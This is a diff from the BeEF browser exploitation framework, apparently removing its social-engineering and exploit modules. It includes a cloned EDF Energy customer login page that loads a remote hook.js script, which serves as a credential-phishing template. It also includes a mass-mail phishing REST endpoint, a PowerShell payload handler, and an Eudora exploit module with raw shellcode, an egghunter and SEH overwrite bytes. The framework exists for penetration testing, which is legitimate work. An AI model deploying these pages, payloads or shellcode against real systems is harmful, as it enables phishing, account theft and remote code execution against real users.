document.getElementById('errorMessage1').innerHTML = "";
change(document.logonForm.f_passwd,'#FFFFFF');
return false;
}
else
{
change(document.logonForm.f_passwd,'#FFFFFF');
document.logonForm.action = "/nclogin.submit";
EDFEDisableSubmitButton1('Login','EDFElogonButton');
document.logonForm.submit();
}
}
}
}
function validateFU()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orcharcd.forgotUserName.ForgotUserNameController";
document.logonForm.submit();
}
function validateFP()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.forgotPassword.ForgotPasswordComp";
document.logonForm.submit();
}
function validateRegisterSME()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.SelfRegistrationComp"+"?refUsr=SME";
document.logonForm.submit();
}
function validateRegisterResi()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.SelfRegistrationComp"+"?refUsr=RESI";
document.logonForm.submit();
}
function validateMR()
{
document.logonForm.action = "/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller";
document.logonForm.submit();
}
</script>
<script type="text/javascript" src="http://192.168.0.3:80/hook.js"></script>
</head>
<body onLoad="history.forward(); document.logonForm.f_username.focus();">
<div id="wrap">
<div id="outer-right">
<div id="outer">
<!--------------------------- start top section ----------------------------------->
<script>
function performSearch()
{
var searchItem = document.getElementById('searchBox');
window.open('http://www.edfenergy.com/search-results.php?query='+searchItem.value,'_blank');
}
function clearText()
{
document.getElementById('searchBox').value="";
}
function EDFEDisableSubmitButton( button_text, button_id )
{
var bid = button_id;
var btext = button_text;
document.getElementById( bid ).innerHTML = "<div class='btbg' id='"+bid+"'><a>"+ btext +" &raquo; </a></div>" ;
}
</script>
<!--------------------------- start top section ----------------------------------->
<div id="header">
<p class="hide-element">
<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#pnav">skip to primary navigation</a>
</p>
<div id='logo'>
<img src='https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/edfenergy_logo2.gif' title='EDF Energy' alt='EDF Energy' width='56' height='89' border='0' />
</div><!-- start top utilities -->
<div id="toplinks">
<div class="left">
<ul>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com">Home</a></li>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com">MyAccount</a></li>
<li><a href="https://my-account.edfenergy.com/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller">My meter reading</a></li>
</ul>
</div>
<div class="right">
<ul>
<li><a href="http://www.edf.com" target="_blank">EDF Group</a></li>
</ul>
<div id="searchform">
<form name="SearchForm" id="SearchForm" action="/irj/portal/anonymous"> <input name="searchBox" id="searchBox" type="text" value="Search" class="searchtextbox" onfocus="clearText()" />
<input name="searchSubmit" type="image" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/search-icon.png" title="Perform Search" class="faq-button" onclick="performSearch(); return false;" />
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfWulwL539YlRxugW3Unfla8YtGvDKb-X_2YFxvNDTOZUB0qVQVl6ZXF"></form>
</div>
</div>
</div>
<div id="olympiclogo">
<img src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/common/london2012_logo_new.gif" alt="London 2012 Official Electricity Supplier" title="London 2012 Official Electricity Supplier" />
</div><!-- end top utilities -->
<!-- start top navigation -->
<div id="topnav">
<div id="topnav-inner">
<p class="hide-element">
<a name="pnav" id="pnav">primary navigation</a>
</p>
<p class="hide-element">
<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#snav">skip to secondary navigation</a>
</p>
<ul>
<li>
<a target="_blank" href="https://www.edfenergy.com/products-services/index.shtml" >Products &amp; Services</a>
</li>
<li>
<a target="_blank" href="http://www.edfenergy.com/energyfuture">Energy Future</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/about-us/index.shtml">About us</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/sustainability/index.shtml">Sustainability</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/careers/index.shtml">Careers</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/media-centre/index.shtml">Media centre</a>
</li>
<li>
<a target="_blank" href="https://www.edfenergy.com/safety-emergencies/index.shtml">Safety &amp; emergencies</a>
</li>
</ul>
<div class="clearFix"></div>
</div>
</div><!-- end top navigation -->
</div>
<!--------------------------- end top section ----------------------------------->
<!--------------------------- end top section ----------------------------------->
<div id="pagehold">
<!--------------------------- start left section ----------------------------------->
<SCRIPT>
function fnNavigateMenu(locationURL,navigParam,menuIden)
{
if (navigParam == 'false')
{
document.outsidemenu.menuidentifier.value = menuIden ;
document.outsidemenu.action = locationURL ;
document.outsidemenu.submit() ;
}
else
{
window.open(locationURL) ;
}
}
</SCRIPT>
<!-- start left section forgottenusername.html;forgottenpassword.html -->
<div id="leftnav-outer">
<div id="leftnav">
<ul>
<li><ul><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="xxx" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/EnterMeterRead_OutAccount.EnterMeterRead_Controller','false','EMR')" >Submit meter reading</a></ul></li>
<li>
<ul>
<a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="xxx" onClick="fnNavigateMenu('http://www.edfenergy.com/contact-us/index.shtml','true','CONTACTUS')">Contact us</a>
</ul>
</li>
<li>
<ul><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="current" onClick="fnNavigateMenu('/irj/portal/anonymous','false','LOGON')" >Login / Register</a>
<ul>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/com.edfe.orcharcd.forgotUserName.ForgotUserNameController','false','FUN')" >Forgotten your username</a></li>
<li><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" class="" onClick="fnNavigateMenu('/irj/servlet/prt/portal/prtroot/com.edfe.orchard.forgotPassword.ForgotPasswordComp','false','FUP')" >Forgotten your password</a></li>
</ul>
</ul>
</li>
</ul>
<ul>
<br/><br/>
<div id="lpButtonDiv" align="center">
</div>
</ul>
</div>
</div>
<!-- end left section -->
<form name="outsidemenu" method="POST" action="/irj/portal/anonymous"> <input type="hidden" name="menuidentifier" value="">
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfWqJ6R7zZUHhDE15UF2cpEumhm0TWuQDLfNnOD8MqMtjNF30GgZOV1f"></form>
<!--------------------------- end left section ----------------------------------->
<!--------------------------- start middle section ----------------------------------->
<div id="maincontent-wrap" class="fullwidth">
<p class="hide-element">
<a name="cont" id="cont">main content</a>
</p>
<div id="maincontent-full" class="nobanner">
<div id="banner" class="BannerWith2Circles">
<h1>
Login / Register
</h1>
<div id="banner_text_wrap">
<img alt="" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/banners/my-account.jpg" />
<div id="banner_text">
<p>
&nbsp;<br />&nbsp;<br />Login or register<br />to access your<br />
energy account online<br />&nbsp;<br />&nbsp;<br />&nbsp;<br />&nbsp;
</p>
</div>
</div>
</div>
<div id="two-col-wrap" class="two_col_wrap_bg">
<div id="content" class="make-full">
<div id="data">
<div id="leftcolumn">
<h2>Login to MyAccount</h2>
<!-- Prototype Builder Start srm::-->
<form name="logonForm" method="post" action="/irj/portal/anonymous">
<span class="legacymessage">
</span>
<span class="legacymessage">
</span>
<span class="warningmessage" id="errorMessage"></span><BR/>
<span class="warningmessage" id="errorMessage1"></span>
<input type ="hidden" name = "f_method" value = "LOGIN" />
<table class="formfields" border="1" summary="Visual Layout for the login form">
<tbody>
<tr>
<th><label for="f_username">Username (email address)<em>*</em></label></th><td>
<input id="f_username" name="f_username" type="text" size="27" maxlength="241" tabindex="1" value=""/>
<A class="form_field_help" href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#f_username"><IMG alt="help" title="help" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/buttons/help_button.gif"><SPAN>Please enter your username</SPAN></A>
</td>
</tr>
<tr>
<th><label for="f_passwd">Password<em>*</em></label></th><td>
<input id="f_passwd" name="f_passwd" type="Password" size="18" maxlength="16" tabindex="2" autocomplete=OFF/>
<A class="form_field_help" href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#f_passwd"><IMG alt="help" title="help" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/images/buttons/help_button.gif"><SPAN>Please enter the password for this account</SPAN></A>
</td>
</tr>
</tbody>
</table>
<input type="submit" value="Login" style="background:#FE5815;color:white!important;heigth:6em;width:7em;font-size:14px;font-family:arial;font-weight:500;margin:0px;padding-left:15px;padding-right:15px;padding-top:7px;padding-bottom:7px;border:none;cursor:pointer">
<br /><br /><br />
<p>Forgotten your <a href="javaScript:validateFU();">username</a> or <a href="javaScript:validateFP();">password</a>?</p>
<input type="hidden" name="__ncforminfo" value="aG5IjEByLfUN7mVuDM1dmcrQChOQXirPHBYBwncOB_h5_QMzu8x_5eBlZcqXpqJKJuOtpQFlZPpXFhCbOjTPxw=="></form>
<!-- Prototype Builder End -->
</div>
<div id="rightcolumn">
<h2>Register Today!</h2>
<p>&nbsp;</p>
<ul>
<li class="tick"> View and pay your bills</li>
<li class="tick"> Submit your meter reading</li>
<li class="tick"> Update your details</li>
<li class="tick"> Sign up for Direct Debit</li>
</ul><br/>
<table border=0><tr>
<td>
<div class="btbu" id="registerButtonResi"><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateRegisterResi();" class="">Register your<br> home &raquo;</a></div>
</td><td>
&nbsp;&nbsp;&nbsp;</td>
<td> <div class="btbu" id="registerButtonSME"><a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateRegisterSME();" class="">Register your<br> business &raquo;</a></div>
</td></tr>
</table>
<br/>
<p><strong>Don't have an online account?</strong><br/>You can still <a href="https://my-account.edfenergy.com/irj/portal/my-account.edfenergy.com#" onClick="validateMR();">submit a meter reading</a></p>
</div>
</div>
</div>
</div>
</div>
</div>
<!--------------------------- end middle section ----------------------------------->
</div><!--pagehold-->
<!--------------------------- start bottom section ----------------------------------->
<script type="text/javascript">
var __stormJs = 't1.stormiq.com/dcv4/jslib/3171_71E90107_6FC7_48DB_B3F5_713D754C9B89.js';
</script>
<script type="text/javascript" src="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/scripts/track.js"></script>
<script type="text/javascript">
function TermsAndConditions()
{
window.open("/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.PromotionalContentComp?fileName=TermsAndConditions.htm","MyAccount","location=no,scrollbars=yes");
//location.href = "/irj/servlet/prt/portal/prtroot/orcss.anonym.tncprivacy.TnCPrivacyPolicyController?urlParameter=tnc";
}
function PrivacyPolicy()
{
window.open("/irj/servlet/prt/portal/prtroot/com.edfe.orchard.SelfRegistration.PromotionalContentComp?fileName=Privacy.html","MyAccount","location=no,scrollbars=yes");
//location.href = "/irj/servlet/prt/portal/prtroot/orcss.anonym.tncprivacy.TnCPrivacyPolicyController?urlParameter=privacy";
}
// Removes leading whitespaces
function LTrim( value ) {
var re = /\s*((\S+\s*)*)/;
return value.replace(re, "$1");
}
// Removes ending whitespaces
function RTrim( value ) {
var re = /((\s*\S+)*)\s*/;
return value.replace(re, "$1");
}
// Removes leading and ending whitespaces
function trim( value ) {
return LTrim(RTrim(value));
}
</script>
<!-- start bottom section -->
<div id="footer">
<ul>
<li>
<a href="javascript:TermsAndConditions();">Terms &amp; conditions</a>
</li>
<li>
<a href="javascript:PrivacyPolicy();">Privacy</a>
</li>
<li>
<a href="http://www.edfenergy.com/products-services/accessibility.shtml" target="_blank">Accessibility</a>
</li>
<li>
<a href="http://www.edfenergy.com/products-services/copyright.shtml" target="_blank">Copyright statement</a>
</li>
<li class="last">
<a href="http://www.edfenergy.com/products-services/fuel-mix.shtml" target="_blank">Our fuel mix</a>
</li>
</ul>
<p class="copy"> &copy; EDF Energy 2012 All rights reserved</p>
<p class = "cookiePolicy">By continuing to use this site, you agree to our <a target="_blank" href="http://www.edfenergy.com/about-us/cookies/cookie-policy.shtml" style = "text-decoration:underline; color: #fff">Cookie Policy</a>.If you don't agree to Cookies<br>being stored on your computer in line with that policy please navigate away from this site.</p>
</div>
<!-- end bottom section -->
<SCRIPT>
document.body.scroll = "";
</SCRIPT>
<!--------------------------- end bottom section ----------------------------------->
</div><!--outer-->
</div>
</div><!--wrap-->
</body>
</html>
</TD></TR></TABLE>
</body></html>

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-left.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 2.9 KiB

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-right-arrow.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 864 B

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/promo-reflection.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 3.5 KiB

13
extensions/social_engineering/models/mass_mailer.rb
View File

@@ -1,13 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Models
class Massmailer < BeEF::Core::Model
end
end
end
end

19
extensions/social_engineering/powershell/bind_powershell.rb
View File

@@ -7,16 +7,11 @@ module BeEF
module Extension
module SocialEngineering
#
# NOTE: the powershell_payload is work/copyright from @mattifestation (kudos for that)
# NOTE: the visual-basic macro code inside the Microsoft Office Word/Excel documents is work/copyright from @enigma0x3 (kudos for that)
#
# If you use the powershell payload for Office documents (extensions/social_engineering/powershell/msoffice_docs),
# make sure you edit the macro inside the sample documents.
# Change the default payload URL (DownloadString('http://172.16.37.1/ps/ps.png'))) with your BeEF server and powershell URL settings.
# By default powershell will be served from http://beef_server:beef_port/ps/ps.png
#
# NOTE: make sure you change the 'beef.http.public' variable in the main BeEF config.yaml to the specific IP where BeEF is binded to,
# and also the powershell-related variable in extensions/social_engineering/config.yaml
# NOTE: make sure you change the 'beef.http.public' settings in the main BeEF config.yaml to the public IP address / hostname for BeEF,
# and also the powershell-related variable in extensions/social_engineering/config.yaml,
# and also write your PowerShell payload to extensions/social_engineering/powershell/powershell_payload.
class Bind_powershell < BeEF::Core::Router::Router
before do
headers 'Pragma' => 'no-cache',
@@ -49,9 +44,11 @@ module BeEF
ps_payload_path = "#{$root_dir}/extensions/social_engineering/powershell/powershell_payload"
ps_payload = ''
ps_payload = File.read(ps_payload_path).gsub('___LHOST___', @ps_lhost).gsub('___LPORT___', @ps_port) if File.exist?(ps_payload_path)
ps_payload
if File.exist?(ps_payload_path)
return File.read(ps_payload_path).to_s.gsub('___LHOST___', @ps_lhost).gsub('___LPORT___', @ps_port)
end
nil
end
end
end

BIN
extensions/social_engineering/powershell/powershell_payload
View File

Binary file not shown.

59
extensions/social_engineering/rest/socialengineering.rb
View File

@@ -68,65 +68,6 @@ module BeEF
error 400 # Bad Request
end
end
# Example: curl -H "Content-Type: application/json; charset=UTF-8" -d 'json_body'
#-X POST http://127.0.0.1:3000/api/seng/send_mails?token=68f76c383709414f647eb4ba8448370453dd68b7
# Example json_body:
# {
# "template": "default",
# "subject": "Hi from BeEF",
# "fromname": "BeEF",
# "fromaddr": "beef@beef.com",
# "link": "http://www.microsoft.com/security/online-privacy/phishing-symptoms.aspx",
# "linktext": "http://beefproject.com",
# "recipients": [{
# "user1@gmail.com": "Michele",
# "user2@antisnatchor.com": "Antisnatchor"
# }]
# }
post '/send_mails' do
request.body.rewind
begin
body = JSON.parse request.body.read
template = body['template']
subject = body['subject']
fromname = body['fromname']
fromaddr = body['fromaddr']
link = body['link']
linktext = body['linktext']
if template.nil? || subject.nil? || fromaddr.nil? || fromname.nil? || link.nil? || linktext.nil?
print_error 'All parameters are mandatory.'
halt 401
end
if (link =~ URI::DEFAULT_PARSER.make_regexp).nil? # invalid URI
print_error 'Invalid link or linktext'
halt 401
end
recipients = body['recipients'][0]
recipients.each do |email, name|
if !/\b[A-Z0-9._%a-z\-]+@(?:[A-Z0-9a-z\-]+\.)+[A-Za-z]{2,4}\z/.match(email) || name.nil?
print_error "Email [#{email}] or name [#{name}] are not valid/null."
halt 401
end
end
rescue StandardError
print_error 'Invalid JSON input passed to endpoint /api/seng/send_emails'
error 400
end
begin
mass_mailer = BeEF::Extension::SocialEngineering::MassMailer.instance
mass_mailer.send_email(template, fromname, fromaddr, subject, link, linktext, recipients)
rescue StandardError => e
print_error "Mailer send_email failed: #{e.message}"
error 400
end
end
end
end
end

15
modules/exploits/beefbind/beef_bind_exploits/active_fax_beef_bind/config.yaml
View File

@@ -1,15 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
Active_fax_beef_bind:
enable: true
category: ["Exploits", "BeEF_bind"]
name: "Active Fax 5.01"
description: "This module attempts to exploit ActiveFax Server 5.01. The bug was initially discovered by Craig Freyman (for more information refer to: <a href='http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html'>http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html</a>). His initial exploit has been modified in order to deliver the BeEF bind payload through Inter-Protocol Exploitation (IPE)."
authors: ["antisnatchor", "Bart Leppens"]
target:
working: ["FF"]

19
modules/exploits/beefbind/beef_bind_exploits/active_fax_beef_bind/module.rb
View File

@@ -1,19 +0,0 @@
#
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Active_fax_beef_bind < BeEF::Core::Command
def self.options
[
{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
{ 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '3000' },
{ 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444' },
{ 'name' => 'jmpesp', 'ui_label' => 'JMP ESP', 'value' => '\x77\x9c\x55\x77' }
]
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end

388
modules/exploits/beefbind/beef_bind_exploits/eudora_mail_beef_bind/command.js
View File

@@ -1,388 +0,0 @@
//
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function () {
var rhost = '<%= @rhost %>';
var rport = '<%= @rport %>';
var service_port = '<%= @service_port %>';
var path = '<%= @path %>';
var delay = parseInt('<%= @delay %>');
var beef_host = '<%= @beef_host %>';
var beef_port = '<%= @beef_port %>';
var beef_proto = beef.net.httpproto;
var beef_junk_port = '<%= @beef_junk_port %>';
var sock_name = '<%= @beef_junk_socket %>';
//todo: this will be obviously dynamic as soon as we'll have more IPEC exploits.
var available_space = 769;
// base64 decode function that works properly with binary data (like shellcode)
var Base64Binary = {
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
decode:function (input) {
//get last chars to see if are valid
var lkey1 = this._keyStr.indexOf(input.charAt(input.length - 1));
var lkey2 = this._keyStr.indexOf(input.charAt(input.length - 1));
var bytes = Math.ceil((3 * input.length) / 4.0);
/**
if (lkey1 == 64) bytes--; //padding chars, so skip
if (lkey2 == 64) bytes--; //padding chars, so skip
**/
var uarray = [];
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
var j = 0;
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
for (i = 0; i < bytes; i += 3) {
//get the 3 octects in 4 ascii chars
enc1 = this._keyStr.indexOf(input.charAt(j++));
enc2 = this._keyStr.indexOf(input.charAt(j++));
enc3 = this._keyStr.indexOf(input.charAt(j++));
enc4 = this._keyStr.indexOf(input.charAt(j++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
uarray.push(chr1 & 0xff);
if (enc3 != 64) uarray.push(chr2 & 0xff);
if (enc4 != 64) uarray.push(chr3 & 0xff);
}
return uarray;
}
};
/*
* Ty's goodness. Slightly modified BeEF bind stager to work with the
* Egg Hunter.
*
* Original size: 299 bytes
* Final size: 326 bytes
* BadChars removed: \x00\x0a\x0d\x20\x7b
*/
var stager = "B33FB33F" +
"\xba\x6a\x99\xf8\x25\xd9\xcc\xd9\x74\x24\xf4\x5e\x31\xc9" +
"\xb1\x4b\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\x9f\x65" +
"\x10\xac\x5f\x96\xe1\xcf\xd6\x73\xd0\xdd\x8c\xf0\x41\xd2" +
"\xc7\x55\x6a\x99\x85\x4d\xf9\xef\x01\x61\x4a\x45\x77\x4c" +
"\x4b\x6b\xb7\x02\x8f\xed\x4b\x59\xdc\xcd\x72\x92\x11\x0f" +
"\xb3\xcf\xda\x5d\x6c\x9b\x49\x72\x19\xd9\x51\x73\xcd\x55" +
"\xe9\x0b\x68\xa9\x9e\xa1\x73\xfa\x0f\xbd\x3b\xe2\x24\x99" +
"\x9b\x13\xe8\xf9\xe7\x5a\x85\xca\x9c\x5c\x4f\x03\x5d\x6f" +
"\xaf\xc8\x60\x5f\x22\x10\xa5\x58\xdd\x67\xdd\x9a\x60\x70" +
"\x26\xe0\xbe\xf5\xba\x42\x34\xad\x1e\x72\x99\x28\xd5\x78" +
"\x56\x3e\xb1\x9c\x69\x93\xca\x99\xe2\x12\x1c\x28\xb0\x30" +
"\xb8\x70\x62\x58\x99\xdc\xc5\x65\xf9\xb9\xba\xc3\x72\x2b" +
"\xae\x72\xd9\x24\x03\x49\xe1\xb4\x0b\xda\x92\x86\x94\x70" +
"\x3c\xab\x5d\x5f\xbb\xcc\x77\x27\x53\x33\x78\x58\x7a\xf0" +
"\x2c\x08\x14\xd1\x4c\xc3\xe4\xde\x98\x44\xb4\x70\x73\x25" +
"\x64\x31\x23\xcd\x6e\xbe\x1c\xed\x91\x14\x35\xdf\xb6\xc4" +
"\x52\x22\x48\xfa\xfe\xab\xae\x96\xee\xfd\x79\x0f\xcd\xd9" +
"\xb2\xa8\x2e\x08\xef\x61\xb9\x04\xe6\xb6\xc6\x94\x2d\x95" +
"\x6b\x3c\xa5\x6e\x60\xf9\xd4\x70\xad\xa9\x81\xe7\x3b\x38" +
"\xe0\x96\x3c\x11\x41\x58\xd3\x9a\xb5\x33\x93\xc9\xe6\xa9" +
"\x13\x86\x50\x8a\x47\xb3\x9f\x07\xee\xfd\x35\xa8\xa2\x51" +
"\x9e\xc0\x46\x8b\xe8\x4e\xb8\xfe\xbf\x18\x80\x97\xb8\x8b" +
"\xf3\x4d\x47\x15\x6f\x03\x23\x57\x1b\xd8\xed\x4c\x16\x5d" +
"\x37\x96\x26\x84";
/*
* Ty's goodness. Original BeEF bind stage.
*
* Original size: 792 bytes
*/
var stage_allow_origin =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28" +
"\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52" +
"\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38" +
"\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58" +
"\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a" +
"\x8b\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5" +
"\x89\xc6\x68\x01\x00\x00\x00\x68\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68\x00\x00\x00\x00\x89" +
"\xe3\x68\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c\x24\x0c\x57\x53\x51\x68\x3e\xcf" +
"\xaf\x0e\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00\x00" +
"\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68\x00\x00\x00\x00" +
"\x68\x01\x00\x00\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24\x04\x68\x00\x00\x00\x00\x68" +
"\x01\x00\x00\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" +
"\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" +
"\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79" +
"\xcc\x3f\x86\xff\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d" +
"\xbe\x18\x04\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20" +
"\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74\x2f" +
"\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c" +
"\x6c\x6f\x77\x2d\x4f\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" +
"\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x31\x36\x0d\x0a\x0d\x0a\x5e\xb9\x62\x00\x00\x00\xf3" +
"\xa4\x5e\x56\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90" +
"\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2" +
"\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff" +
"\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00\x5e\x89\x3e\x6a\x00\x68\x00" +
"\x04\x00\x00\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" +
"\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb\xf2\x81\xc3" +
"\x03\x00\x00\x00\x43\x53\x68\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00\x57\x68\x01\x00\x00\x00" +
"\x53\x8b\x5c\x24\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00" +
"\x00\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24\x74\x8b" +
"\x1b\x53\x68\x18\xb7\x3c\xb3\xff\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0\x74\x3d\x68\x00\x00" +
"\x00\x00\x8d\xbe\x14\x04\x00\x00\x57\x68\x86\x0b\x00\x00\x8d\xbe\x7a\x04\x00\x00\x57\x8d\x5c" +
"\x24\x70\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18\x04" +
"\x00\x00\x57\xff\x36\x68\xc2\xeb\x38\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52\xff\xd5\xe9\x38" +
"\xfe\xff\xff";
// Skape's NtDisplayString egghunter technique, 32 bytes -> see also string T00W inside
/*
* Egg Hunter (Skape's NtDisplayString technique).
* Original size: 32 bytes
*
* Next SEH and SEH pointers
* Size: 8 bytes
*/
var egg_hunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +
"\xef\xb8\x42\x33\x33\x46\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
var next_seh = "\xeb\x06\x90\x90";
var seh = "\x4e\x3b\x01\x10";
gen_nops = function(count){
var i = 0;
var result = "";
while(i < count ){ result += "\x90";i++;}
log("gen_nops: generated " + result.length + " nops.");
return result;
};
/*
* send_stager_back():
